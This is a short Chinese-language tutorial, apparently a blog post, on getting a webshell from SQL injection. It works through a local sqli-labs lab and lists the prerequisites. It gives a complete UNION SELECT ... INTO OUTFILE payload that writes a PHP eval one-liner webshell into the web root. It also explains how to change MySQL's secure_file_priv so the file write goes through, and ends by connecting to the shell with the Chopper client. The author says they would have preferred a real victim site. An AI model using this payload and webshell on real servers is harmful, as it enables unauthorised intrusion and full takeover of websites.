Sql注入getshell

1. 今天想写个sql注入getshell的文章，找了2个小时没找到真实的案例，为什么要用真实案例呢，因为本地搭建的站点搞起来没有激情，看文章的也没有激情，因为是假的，这次确实没找到案例，下次碰见再补上吧。
2. 开搞！！
3. mysql搭建的站点，要getshell需要有几点前提，缺一不可：

• 网站的绝对路径
• gpc状态是关闭的
• root用户权限

4. 挨个看下条件是否满足

   
   1.jpg

2.jpg 3.jpg

5. 条件都满足，直接写shell

http://192.168.3.50/2sqli-labs/Less-2/?id=-1 union select 1,"<?php @eval($_POST['storm']);?>",3 into outfile "C:/phpStudy/WWW/cmd.php" %23

4.jpg

6. 因为是本地搭建的原因，出现了一个错误，百度了一下是因为 secure-file-priv 的原因，对通过文件导入导出作了限制，在my.ini中修改就好了。
   查看是否有
   secure_file_priv =
   这样一行内容，如果没有，则手动添加
   secure_file_priv = /home
   表示限制为/home文件夹
   secure_file_priv =
   表示不限制目录，等号一定要有，否则mysql无法启动

   
   5.jpg

7. 再执行写shell的语句，没有任何爆错

   
   6.jpg

8. 看一下根目录，shell已经躺在里边了

   
   7.jpg

9. 拿出菜刀连接就可以了

   
   8.jpg